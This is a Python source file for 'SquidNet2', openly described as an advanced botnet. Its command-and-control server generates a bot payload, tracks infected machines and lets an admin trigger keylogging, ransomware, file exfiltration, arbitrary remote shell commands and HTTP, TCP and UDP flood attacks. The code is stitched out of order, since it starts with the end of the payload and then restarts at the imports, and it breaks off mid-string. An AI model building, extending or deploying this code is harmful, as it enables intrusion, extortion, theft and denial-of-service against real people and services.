self.client.send(output.encode()) except Exception as e: self.client.send(f"There was an error in the Database file: {e}".encode()) bot = Bot('"""+self.external_ip+"""',"""+str(self.external_port)+""", """+str(self.enc_key)+""") bot.initiate_connection() """ return payload class AutoUpdate: def __init__(self): self.version = 4.0 def check_update(self): print(BotNet.logo(None)) print("[+] Checking for updates.....") version = self.version - 1.0 updated = False try: req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/SquidNet2Version.json") recv = 
urllib.request.urlopen(req).read().decode() version_info = open("SquidNet2Version.json","w") version_info.write(recv) version_info.close() json_info = json.load(open(version_info.name,"r")) version = float(json_info[0]["SquidNet2"]) except: print("[+] There was an error with checking updates, starting SquidNet2.") if version > self.version: print(f"[+] Your Version of SquidNet2 is outdated. You have version {self.version}, whereas the current update is version v{version}.") update = input("\n[+] Do you wish to update?(y/n): ").lower() if update == "y" or update == "yes": print(f"[+] Updating SquidNet2 to v{version}") updated = True req = urllib.request.Request(url="https://raw.githubusercontent.com/DrSquidX/SquidNet2/main/MainScripts/SquidNet2.py") resp = urllib.request.urlopen(req).read() file = open(sys.argv[0],"wb") file.write(resp) file.close() else: print("[+] Choosing not to update.") if not updated: if sys.platform == "win32": os.system("cls") else: os.system("clear") Squidnet = Config(self.version) Squidnet.read_config() else: print("[+] Restart the Script to have the Update be effective!") class Config: """Class needed for using the config file.""" def __init__(self, version): self.version = version self.config_file = "server.config" def read_config(self): """The config file is read here, where the variables that are in the file are used for the main server.""" try: file = open(self.config_file,"r") content = file.readlines() for i in content: if i.startswith("\nhostip") or i.startswith("hostip"): hostip = i.replace("=","").split()[1] elif i.startswith("\nhostport") or i.startswith("hostport"): hostport = int(i.replace("=","").split()[1]) elif i.startswith("\nexternal_host") or i.startswith("external_host"): external_host = i.replace("=","").split()[1] elif i.startswith("\nexternal_port") or i.startswith("external_port"): external_port = int(i.replace("=","").split()[1]) elif i.startswith("\nlogfile") or i.startswith("logfile"): logfile = i.replace("=","").split()[1] elif i.startswith("\nadmin_name") or i.startswith("admin_name"): admin_name = i.replace("=","").split()[1] elif i.startswith("\nadmin_password") or i.startswith("admin_password"): admin_password = i.replace("=","").split()[1] elif i.startswith("\nenc_key") or i.startswith("enc_key"): enc_key = f"{i.replace("=","").split()[1]}=".encode() elif i.startswith("\nftp_dir") or i.startswith("ftp_dir"): ftp_dir = i.replace("=","").split()[1] elif i.startswith("\nransomware_active") or i.startswith("ransomware_active"): ransomware_active = i.replace("=","").split()[1] if ransomware_active.lower() == "f": ransomware_active = False else: ransomware_active = True Squidnet = BotNet(hostip, hostport, self.version, external_host, external_port, admin_name, admin_password, logfile, enc_key, ftp_dir, ransomware_active) Squidnet.start() except Exception as e: self.gen_config_file() def gen_config_file(self): """If there is an error in the usage of the config file, a new config file will be generated, and the user can simply restart the script to have a functional server.""" print(BotNet.logo(None)) print("[+] There is an error in the config file. 
Re-writing and re-formatting to be able to be used by the server.") gen_content = """ hostip = localhost hostport = 8080 external_host = localhost external_port = 8080 logfile = log.txt admin_name = admin admin_password = adminpassword12345 enc_key = iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8= ftp_dir = Bot_Files ransomware_active = f """ file = open(self.config_file,"w") file.write(gen_content) file.close() print("[+] The Config file has been reformatted and is now usable by the server! Restart the script to start the server.") item = AutoUpdate() item.check_update()
import socket, threading, hashlib, os, datetime, time, sqlite3, shutil, urllib.request, json, sys class BotNet: """Main Class for the BotNet. Every single line of server code, payload code is inside of this class. There are many functions inside of the class, where they have many different uses. They vary in usefullness and effectiveness, nonetheless they all contribute to the overall functioning of the server. It uses a lot of logic and similar code from DatCord, which was a server that truly displayed my advancements in network programming, where it also is an improvement from the previous SquidNet. SquidNet2 does not have as many bugs, and also not as many useless functions. This script remains unfinished(I worked on it a lot on an airplane DX), so there could be many problems that could possibly occur.""" def logo(self): """Logo of the script, nothing too special here.""" logo = """ /\\ //\\\\ //__\\\\ //____\\\\ \\\____// \\\__// [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] /) [|__|] (\\ //\_________[|__|]________/\\\\ ))__________||__||_________(( <_/ [ \/ ] \_> || || || || || || || || || || || || || || || || || || _________ .__ .||_||_||__ __ ________ _____ _______ / _____/ ________ __|__| __|||/\ \ _____/ |_\_____ \ ___ __/ | | \ _ \ \_____ \ / ____/ | \ |/ __ | / | \_/ __ \ __\/ ____/ \ \/ / | |_ / /_\ \ / < <_| | | / / /_/ |/ | \ ___/| | / \ \ / ^ / \ \_/ \\ /_______ /\__ |____/|__\____ |\____|__ /\___ >__| \_______ \ \_/\____ | /\ \_____ / \/ |__| \/ || || \/ \/ \/ |__| \/ \/ || || || || || || || || || || || || || || || || || || \\\ || // \\\||// \\\// ____-\/-____ -__- / \\ Advanced Botnet By DrSquid [+] Github: https://github.com/DrSquidX""" return logo def __init__(self, ip, port, version, external_ip=None, external_port=None, admin_user="admin", admin_pass="adminpassword12345", logfile="log.txt", enc_key=b'iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8=', ftp_dir="Bot_Files", ransomware_active=True): """Initiation of the class. Most of every important variable is mentioned here. This function is very important, as it has the definitions of all of the important variables needed for functionality, and also for specification of different things. Many things are defined here, such as the socket that will be used to handle all of the connections, as well as all of the smaller, yet very important variables that would hinder the performace and functionality of the script, if they were to be missing. 
There is also the use of some functions, as they are needed to help configure different things inside of the server.""" self.ip = ip self.port = int(port) self.downloading = False self.ddosing = False self.enc_key = enc_key self.botdownload = None self.ftp_dir = ftp_dir self.ransomware_active = ransomware_active self.external_ip = external_ip self.external_port = external_port self.admin_online = False self.logfile = logfile self.sqlfilename = "Server.db" self.filetransfer = False self.sqlconnected = False self.sending_file = False self.auto_ban = False self.keylogging = False self.botinfofile = "botinfo.txt" self.timetoautoban = 0 botinfo = open(self.botinfofile,"w").close() self.max_connpersec = 20 self.connpersec = 0 self.conncount = 0 self.timer = 1 self.conf_dbfile() file = open(self.logfile, "w").close() self.log(self.logo()) self.version = version if self.external_ip is None: self.external_ip = self.ip if self.external_port is None: self.external_port = self.port if self.ransomware_active: self.quot = "" else: self.quot = "'''" self.payload = self.gen_payload() self.payloadfile = open("SquidBot.py","w") self.payloadfile.write(self.payload) self.payloadfile.close() if self.ftp_dir not in os.listdir(): os.mkdir(self.ftp_dir) self.log(f"""[({datetime.datetime.today()})][(INFO)]: Server Started on {self.ip}:{self.port} [({datetime.datetime.today()})][(INFO)]: Bots/Admins will connect to: {self.external_ip}:{self.external_port} [({datetime.datetime.today()})][(INFO)]: Payload Bot Script Generated in {os.path.join(os.getcwd(), "SquidBot.py")}""") self.botnum = 1 self.connlist = [] self.botinfo = [] self.adminconn = None self.focusing = False self.focus_conn = None self.focus_botname = "" self.admin_username = admin_user self.admin_password = hashlib.sha256(admin_pass.encode()).hexdigest() self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shutil.copyfile(os.path.join(os.getcwd(),self.payloadfile.name), os.path.join(os.getcwd(),self.ftp_dir,self.payloadfile.name)) self.log(f"[({datetime.datetime.today()})][(SERVER)]: Payload file has been transferred to the FTP directory(for extraction of Admin).") def exec_sql_cmd(self, file, cmd): """Optimization code made for executing commands on db files. The reason it was made was for optimization purposes. This excerpt of code would be pretty much all over the place in this script if it weren't a function, and it would make the script look less elegant and clean with all of the repitition.""" output = "" try: db = sqlite3.connect(file) cursor = db.cursor() cursor.execute(cmd) output = cursor.fetchall() db.commit() cursor.close() db.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(RESETSQL)]: Error with SQL Database file '{self.sqlfilename}': {e}, reconfiguring as a precaution.") self.conf_dbfile() return output def conf_dbfile(self): """This function helps configure the database file that contains the IP whitelists and banlists. As you can see, there is the previous function that was used to optimize the code. 
What the function truly does, is create the Database file if it doesn't already exist, and create the tables containing the IP banlist and whitelist if they do not exist.""" try: file = open(self.sqlfilename,"rb") except: file = open(self.sqlfilename,"wb") file.close() self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipbanlist(ip)") self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipallowlist(ip)") def return_iplist(self, list_type): """This gets a list of the IPs, although you need to specify whether it is from the IP Whitelist or the Banlist.""" banned_ips = self.exec_sql_cmd(self.sqlfilename, f"select ip from ip{list_type}list") new_ip_list = [] for i in banned_ips: new_ip_list.append(i[0]) return new_ip_list def add_ip(self, ip, list_type): """This adds an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"insert into ip{list_type}list values('{ip}')") def remove_ip(self, ip, list_type): """This removes an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"delete from ip{list_type}list where ip = '{ip}'") def help_msg(self): """The help message sent to the admins if they request it. It contains all of the information about the commands, and also the commands themselves. The arguements are provided, so that the user can get a sense of how to actually use the commands effectively.""" return """\n[(SERVER)]: Info about each command: [+] Utilities: [+] !whitelistip <ip> - Adds an IP to the whitelist, allowing them to connect to the server during a DDoS Attack. [+] !unwhitelistip <ip> - Removes an IP from the whitelist. [+] !banip <ip> - Bans an IP from the server, therefore having them kicked every time they try to connect to the server. [+] !unbanip <ip> - Removes an IP from the server. [+] !focusconn <botname> - Only be able to send or see messages from a single bot. [+] !stopfocus - Stops focus mode. [+] !getipwhitelist - Obtains the list of the IP Addresses in the Whitelist. [+] !getipbanlist - Obtains the list of the IP Addresses in the Banlist. [+] !getbotinfo - Displays information from each of the bots. [+] !help - Displays this message. [+] !startftp - Start file transfer protocol between the admin and the server(to get any transferred Bot Files). [+] !togglelisten - Toggles the setting for the server to listen for connections or not. [+] Bot Commands: [+] !filedownload <file> - Download a file on a single bot computer(requires focus mode). [+] !download <file> <link> - Make the bot download a file from the internet. [+] !mkdir <dir> - Create a folder inside of the bots working directory. [+] !delfolder <dir> - Remove a folder inside of the bots working directory. [+] !createfile <filename> - Create a file in the bots. [+] !delfile <filename> - Delete a file in the bots. [+] !encfile <filename> - Encrypt a file inside of the bots. [+] !decrypt <filename> - Decrypt a file that has been encrypted. [+] !open <filename> - Open a file inside of the bots working directory. [+] !viewfilecontent <file> - View the contents of a file in the bots directory. [+] !writefile <filename> - Open and write inside of a file inside of the bots. [+] !sqlconnect <sqlfile> - Connect to a Sqlite3 Compatable Database file in the bots. [+] !changedir <dir> - Changes the bots working directory to the one specified(use '%user%' as the user for multiple bots). [+] !stopsql - Disconnect from the connected Database file. [+] !stopwrite - Close writing mode and return to normal. 
[+] !getcwd - Get the current directory of the bots. [+] !keylog - Activate keylogging to see the bots keystrokes. [+] !stopkeylog - Stops the keylogging. [+] !listdir - List all of the items in the bots working directory. [+] !ransomware - Activates the ransomware program inside of the bots. [+] DDoS Attack Commands: [+] !httpflood <website> <delay> - Make the bots conduct an HTTP Flood Attack on the specified Website. [+] !tcpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a TCP Flood Attack on the specified IP and Port. [+] !udpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a UDP Flood Attack on the specified IP and Port. [+] !stopatk - Stops the current DDoS Attack that is happening(only one can happen at a time). [+] Note: Any other instructions will be run as shell commands on the remote computers.""" def file_tranfer_help_msg(self): """If the user decides to go onto FTP mode, they will be able to extract files that were extracted from the server via the connected bots. This is the help message sent to the user, if they request help. Like the previous help message, it has all the commands and the information and parameters about them, for the user to use these commands effectively.""" return """\n[(SERVER)]: Info about each command in FTP Mode. [+] !help - Displays this message. [+] !fileinfo - Displays all of the files inside of Server's directory. [+] !download [filename] - Downloads a specified file inside of the Server's directory. [+] !listdir - Gets all of the files inside of the Server's directory. [+] !stopftp - Return to the Botnet and controlling the bots. [+] Note: You will be unable to send messages to the bots in FTP Mode. You can return to normal by inputting '!stopftp'. """ def start(self): """This function is vital for the functionality of the server, because it actually starts it! It simply tries to bind the server to the IP and Port that were provided in the config file. If it doesn't work, an error message will be displayed, so that the user can get a sense of the problem.""" working = False try: self.server.bind((self.ip, self.port)) working = True except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with binding the server: {e}. Try to change some of the variables in the Config files if needed.") if working: self.listener = threading.Thread(target=self.listen).start() def conn_persec_timer(self): """Function used for the not-so-perfect Anti-DDoS System. 
It measure the connections per second, and decides whether to take action against them(by that I mean banning them).""" while True: time.sleep(1) self.timer += 1 if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.max_connpersec <= self.connpersec: self.timetoautoban += 1 if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 if self.timer >= 60: self.timer = 1 self.connpersec = 1 self.conncount = 0 try: self.connpersec = self.conncount / self.timer except: pass def config_conn_vars(self): """Optimization code made for less repitition.""" self.connpersec = self.conncount / self.timer if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 self.conncount += 1 if self.max_connpersec <= self.connpersec: if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 def listen(self): """A very important function for the server. It listens to all of the connections, if it is able to, as the 'self.listening' variable can be toggled on and off, making the server unable to listen for connections. It also has some of the Anti-DDoS code, where it also closes any connections inside of the banlist, and allows connections in the whitelist into the server without any interruption.""" self.log(f'[({datetime.datetime.today()})][(LISTEN)]: Server is listening.....') self.listening = True connpersectimer = threading.Thread(target=self.conn_persec_timer) connpersectimer.start() while True: if self.listening: try: self.server.listen() conn, ip = self.server.accept() if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.listening: kicked = False if ip[0] in self.return_iplist("ban"): conn.close() kicked = True else: if self.auto_ban: if ip[0] in self.return_iplist("allow"): self.config_conn_vars() else: self.log(f"[({datetime.datetime.today()})][(BANNING_IP)]: {ip[0]} attempted to join the server during the DDoS Attack, banning as a precaution.") self.add_ip(ip[0],"ban") conn.close() kicked = True else: self.config_conn_vars() if not kicked: conn.send(f"SquidNet Server v{self.version}".encode()) handler = threading.Thread(target=self.handle, args=(conn, ip)) handler.start() else: conn.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with listening for connections: {e}") def obtain_botname_list(self): botnames = [] for i in self.botinfo: botnames.append(i[0]) return botnames def parse_info_msg(self, infomsg, conn, srcport): """There is a message sent by every client to the server, which would contain information about them. This include their hostname, IP Address, User, and Operating System. This is mainly for the bots, so that the admin would have a sense of the computer they have take control of. 
It returns a list of all of the information, to be used later.""" try: name = f"{infomsg.split()[1]}{self.botnum}" except: name = f"Bot{self.botnum}" self.botnum += 1 try: ip = infomsg.split()[2] except: ip = "127.0.0.1" try: osuser = infomsg.split()[3] except: osuser = "Unknown" try: os = infomsg.split()[4] except: os = "Unknown" self.botnum += 1 ogcontent = open(self.botinfofile,"r") content = ogcontent.read() file = open(self.botinfofile,"w") file.write(content) file.write(f"\n[+] Botname: {name}\n[+] IP: {ip}\n[+] Src Port: {srcport}\n[+] User: {osuser}\n[+] OS: {os}\n[+] Conn: {conn}\n") file.close() return [name, ip, srcport, osuser, os, conn] def get_filename(self, msg): """When there is a file trying to be provided for file transfering(etc), there might be files with names with spaces in them. This is a problem with my old system of file name obtaining, as the filenames with spaces would only have the first word of the file used to create or do something with said file. This function fixes that problem, by returning the actual name of the file.""" msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def log(self, logitem, display=True): """Important function, needed for logging. This is so that the Server Owner can see what happened in the server, in case of a crash or bug that needed to be fixed. This helps, as all of the output in the server is the same as the output in the log file. The server owner would be able to see any bugs or issues, or easily anything that happened in the server at all. However, the log file is wiped everytime the server restarts(I can easily change that, you can contact me if you want that to happen).""" content = "" if display: print(logitem) try: file = open(self.logfile, "r") content = file.read() file.close() except Exception as e: print(f"[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.") content = f"""{self.logo()}\n[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.""" file = open(self.logfile,"w") file.write(content+"\n"+logitem) file.close() def send_to_other(self, sender, reciever, msg, recieverconn, send_raw=False): """Code for optimizing sending and logging at the same time. It logs the message that is being sent, and it also sends the message to the connection that the sender its trying to send to.""" item = f"[({datetime.datetime.today()})][({sender})--->({reciever})]: {msg}" self.log(item) if not send_raw: recieverconn.send(f"\n[({sender})]: {msg}".encode()) else: recieverconn.send(msg.encode()) def send_file(self, filename, conn): """Function needed for FTP. It sends all of the bytes of the file being transferred to the specified connection, which in this case it will be the server admin due to the function only being used in the transferring of files from the server to the server admin.""" self.sending_file = True file = open(filename, "rb") time.sleep(2) while True: sendto = file.read(10240) if not sendto: time.sleep(2) conn.send("!stopsave".encode()) break else: conn.send(sendto) time.sleep(5) self.send_to_other("SERVER",self.admin_username,"File Transfer completed.", conn) def handle(self, conn, ip): """Very important function, needed for handling the connections of the clients. The way a bot is recognized is quite simple really. There are many variables that help with the process. 
The handler first uses the information packet(the one with all of the client information), to see if the bot is a bot or a fake bot. If the information packet is invalid(if it does not start with '!botreg'), the connection will be simply closed. If the packet is valid, the Bot will have the ability to become an admin(if they have the correct credentials). If they are not an admin, they cannot do anything to take control of the server, but simply be able to send messages around to the admin and server. If the Bot is trying to be an admin, they can send an authentication message(in this case its '!login') followed by the credentials. These credentials are not displayed on the log. For authentication to happen. The username is checked with the server variable to see if they match. If they do, now the passwords need to match. There is password hashing in the server(sha256 hashing algorithm), for further security and to prevent any breaches. The password provided would be hashed into sha256, to see if it matches with the hashed password that the server has. It these all match, access is granted to the admin, where they can now do whatever they want with the bots, whether good or bad. There are many things to do with the assortment of commands that are provided.""" bot = False name = ip admin = False registered = False while True: try: display_single_msg = True msg_from_bot = conn.recv(10240) try: msg = str(msg_from_bot.decode()).strip() except: msg = str(msg) if msg.strip() != "": if not bot: info_packet = msg if not info_packet.startswith("!botreg"): conn.close() break else: self.connlist.append(conn) info = self.parse_info_msg(msg, conn, ip[1]) self.botinfo.append(info) name = info[0] ipaddr = info[2] if ipaddr in self.return_iplist("ban"): conn.close() break registered = True original_name = name self.log(f"[({datetime.datetime.today()})][(BOTJOIN)]: Bot {name} has joined the botnet.") try: self.adminconn.send(f"\n[(SERVER)]: Bot {name} has joined the botnet.".encode()) except: pass bot = True elif bot: if not admin: if msg.startswith("!login"): if not self.admin_online: try: username = msg.split()[1] password = msg.split()[2] if username == self.admin_username and hashlib.sha256(password.encode()).hexdigest() == self.admin_password: self.log(f"[({datetime.datetime.today()})][(INFO)]: A new admin session has been created.") name = self.admin_username admin = True self.adminconn = conn self.admin_online = True self.send_to_other("SERVER",name,"Successfully logged into the Botnet. You have access to all of the bots.", conn) self.send_to_other("SERVER",name,"Input '!help' if you need more info on the commands.", conn) for i in self.botinfo: if i[0] == original_name: self.botinfo.remove(i) break else: self.send_to_other("SERVER",name,"Authentication Failed.", conn) except: pass else: self.send_to_other("SERVER",name,"There is already an active owner session. 
Please wait until they log off.", conn) elif msg.startswith("!key") and self.keylogging: keystroke = msg.split()[1] keyfile = open(name+".txt","r") content = keyfile.read() keyfile.close() newkeyfile = open(name+".txt","w") newkeyfile.write(content) newkeyfile.write(f"\n[+] {keystroke}") newkeyfile.close() else: try: display_single_msg = False if not self.focusing: display_single_msg = True else: if conn == self.focus_conn: if not self.downloading: self.send_to_other(name, self.admin_username,msg, self.adminconn) else: try: if msg == "!stopsave": self.downloading = False self.botdownload.close() elif msg == "!fileerror": self.downloading = False self.botdownload.close() os.remove(self.botdownload.name) self.send_to_other("SERVER",self.admin_username,"There was an error with downloading the bot's file. Cancelling the download.") else: self.botdownload.write(msg_from_bot) except Exception as e: self.botdownload.write(msg_from_bot) except: display_single_msg = True elif admin: if not self.filetransfer: if msg.startswith("!help"): self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the help message.") self.adminconn.send(self.help_msg().encode()) elif msg.startswith("!startftp"): self.send_to_other("SERVER",name, "Activiting FTP mode. You will be able to get files inside of the servers directory(for ex downloaded bot Files).", conn) self.send_to_other("SERVER",name, "You can input '!help' in case you need to know what commands are there for you.", conn) self.filetransfer = True elif msg.startswith("!focusconn"): try: botname = msg.split()[1] found = False for i in self.botinfo: if i[0] == botname: self.focus_conn = i[len(i)-1] found = True if found: self.send_to_other("SERVER",name,f"You can now only see output from bot {botname}.", conn) self.focus_botname = botname self.focusing = True except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !focusconn <botname>", conn) elif msg.startswith("!banip"): try: banned_ip = msg.split()[1] if banned_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is in the whitelist! Unwhitelist it to ban it.", conn) elif banned_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the banlist!", conn) else: self.add_ip(banned_ip, "ban") self.send_to_other("SERVER",name,f"IP Address '{banned_ip}' has been banned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !banip <ip>", conn) elif msg.startswith("!unbanip"): try: unbanning_ip = msg.split()[1] if unbanning_ip not in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the banlist!", conn) else: self.remove_ip(unbanning_ip,"ban") self.send_to_other("SERVER",name,f"IP Address '{unbanning_ip}' has been unbanned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! 
Here is the valid input: !unbanip <ip>", conn) elif msg.startswith("!getipbanlist"): self.send_to_other("SERVER",name,f"IP Ban List: {self.return_iplist('ban')}", conn) elif msg.startswith("!getipwhitelist"): self.send_to_other("SERVER",name,f"IP White List: {self.return_iplist('allow')}", conn) elif msg.startswith("!whitelistip"): try: whitelist_ip = msg.split()[1] if whitelist_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the whitelist!", conn) elif whitelist_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is in the banlist!", conn) else: self.add_ip(whitelist_ip, "allow") self.send_to_other("SERVER",name,f"IP Address '{whitelist_ip}' has been whitelisted in the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !whitelistip <ip>", conn) elif msg.startswith("!unwhitelistip"): try: unwhitelist_ip = msg.split()[1] if unwhitelist_ip not in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the whitelist!", conn) else: self.remove_ip(unwhitelist_ip,"allow") self.send_to_other("SERVER",name,f"IP Address '{unwhitelist_ip}' has been unwhitelisted from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !unwhitelistip <ip>", conn) elif msg.startswith("!togglelisten"): if self.listening == True: self.listening = False elif self.listening == False: self.listening = True self.log(f"[({datetime.datetime.today()})][(INFO)]: Listening for connections has been set to: {self.listening}") self.adminconn.send(f"\n[(SERVER)]: Listening for connections has been set to: {self.listening}".encode()) elif msg.startswith("!stopfocus"): if not self.focusing: self.send_to_other("SERVER",name,"You are not focusing on a bot right now!", conn) else: self.focusing = False self.focus_conn = None self.send_to_other("SERVER",name,f"Stopped focusing on bot {self.focus_botname}.", conn) self.focus_botname = "" elif msg.startswith("!getbotinfo"): if len(self.botinfo) == 0: self.send_to_other("SERVER",name, "There are no bots connected to the Botnet at the moment.", conn) for bot in self.botinfo: if "closed" in str(bot[5]): self.botinfo.remove(bot) else: self.send_to_other("SERVER",name,f"Info on Bot {bot[0]} - IP: {bot[1]} Src-Port: {bot[2]} User: {bot[3]} OS: {bot[4]} Conn: {bot[5]}", self.adminconn) elif msg.startswith("!filedownload"): try: filename = self.get_filename(msg) if self.downloading: self.send_to_other("SERVER",name,"You are already downloading a file from the bot computer!", conn) else: if self.focusing: self.botdownload = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"wb") self.downloading = True self.send_to_other(self.admin_username,self.focus_botname,msg, self.focus_conn, True) self.send_to_other("SERVER",name,f"Attempting to download file {filename} from {self.focus_botname}. You will not be able to send instructions to any of the bots until the download finishes!", conn) else: self.send_to_other("SERVER",name,"You need to be in focus mode to be able to download files from bots(there would be a lot of traffic going on in the server)!", conn) except: self.send_to_other("SERVER",name,"Invalid input! 
Here is the valid input: !filedownload <filename>", conn) else: if msg.startswith("!stopatk"): if self.ddosing: if not self.focusing: self.ddosing = False self.send_to_other("SERVER",self.admin_username,"Attempting to stop all DDoS Attacks in the botnet.",self.adminconn) else: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will stop attacking!",self.adminconn) elif not self.ddosing: self.send_to_other("SERVER",self.admin_username,"The Bots are currently not attacking any domain.",self.adminconn) elif msg.startswith("!keylog"): self.send_to_other("SERVER",self.admin_username,"Activating Keylogger script on the bots(All of the logged keystrokes will be in a txt file with the bot's name).",self.adminconn) self.keylogging = True botnames = self.obtain_botname_list() for i in botnames: try: keylogfile = open(f"{i}.txt","r") except: keylogfile = open(f"{i}.txt","w") keylogfile.write(f"\nLOGGED KEYSTROKES FOR BOT {i}\n") keylogfile.close() elif msg.startswith("!stopkeylog"): self.keylogging = False self.send_to_other("SERVER",self.admin_username,"Deactivating Keylogger script on the bots.",self.adminconn) elif msg.startswith("!ransomware"): if self.ransomware_active: if self.focusing: self.send_to_other("SERVER",name,"Only the bot in focus mode has had the ransomware program activated!", conn) else: self.send_to_other("SERVER",name,"Ransomware programs are activating!", conn) self.send_to_other("SERVER",name,"Payloads are effective!", conn) else: self.send_to_other("SERVER",name,"The ransomware has been disabled in the config file. Turn the value assigned to 'ransomware_active' to 't'", conn) elif msg.startswith("!download"): try: filename = msg.split()[1] website = msg.split()[2] self.send_to_other("SERVER",self.admin_username,f"Making the bots download contents from '{website}' into file {filename}",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !download <filename> <website>", conn) elif msg.startswith('!httpflood'): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: msgtobot = msg.split() if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True try: targ_website = msgtobot[1] atk_delay = float(msgtobot[2]) self.send_to_other("SERVER",self.admin_username,f"Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !httpflood <website> <atk_delay>", conn) elif msg.startswith('!udpflood') or msg.startswith("!tcpflood"): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! 
Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True if msg.startswith('!udpflood'): protocol = "UDP" elif msg.startswith("!tcpflood"): protocol = "TCP" msgtobot = msg.split() try: target = msgtobot[1] try: port = int(msgtobot[2]) except: port = 80 try: delay = float(msgtobot[3]) except: delay = 0 self.send_to_other("SERVER",self.admin_username,f"Beginning {protocol} Flood Attack on {target}:{port} with delay of {delay}.",self.adminconn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !{protocol.lower()}flood <ip> <port> <delay>", conn) if not self.focusing and not self.downloading: if msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->(BOTS)]: {msg}") display_single_msg = False for bot in self.connlist: try: if conn != bot: if msg.startswith("!ransomware") and not self.ransomware_active: pass else: bot.send(msg.encode()) except: pass else: if not self.downloading: if msg.strip() != "": display_single_msg = False self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->({self.focus_botname})]: {msg}") self.focus_conn.send(msg.encode()) elif self.filetransfer: if msg.startswith("!help"): self.adminconn.send(self.file_tranfer_help_msg().encode()) self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the FTP Help message.") elif msg.startswith("!download"): try: filename = self.get_filename(msg) file = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"rb") file.close() self.send_to_other("SERVER",name, f"Preparing to download file: {file.name}.", conn) self.send_file(file.name, conn) except FileNotFoundError: self.send_to_other("SERVER",name,f"The file specified does not exist!", conn) except Exception as e: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !download <file>", conn) elif msg.startswith("!listdir"): dirlist = os.listdir(path=os.path.join(os.getcwd(), self.ftp_dir)) self.send_to_other("SERVER",name,f"Files extracted from bots: {dirlist}",conn) elif msg.startswith("!stopftp"): self.send_to_other("SERVER",name,"De-Activating FTP Mode. Returning to the Botnet. You will be able to send commands to the bots.",conn) self.filetransfer = False if display_single_msg: if not msg.startswith("!login"): if not msg.startswith("!key") and msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({name})]: {msg}") if conn != self.adminconn: self.adminconn.send(f"\n[({name})]: {msg}".encode()) else: self.log(f"[({datetime.datetime.today()})][({name})]: Attempting to log into the Admin Account.") except Exception as e: if registered: self.log(f"[({datetime.datetime.today()})][(ERROR)]: Closing connection with {name} due to error: {e}") if conn == self.adminconn: self.log(f"[({datetime.datetime.today()})][(INFO)]: The admin has left the Botnet.") self.adminconn = None self.admin_online = False else: try: if registered: self.adminconn.send(f"[(SERVER)]: {name} has disconnected from the 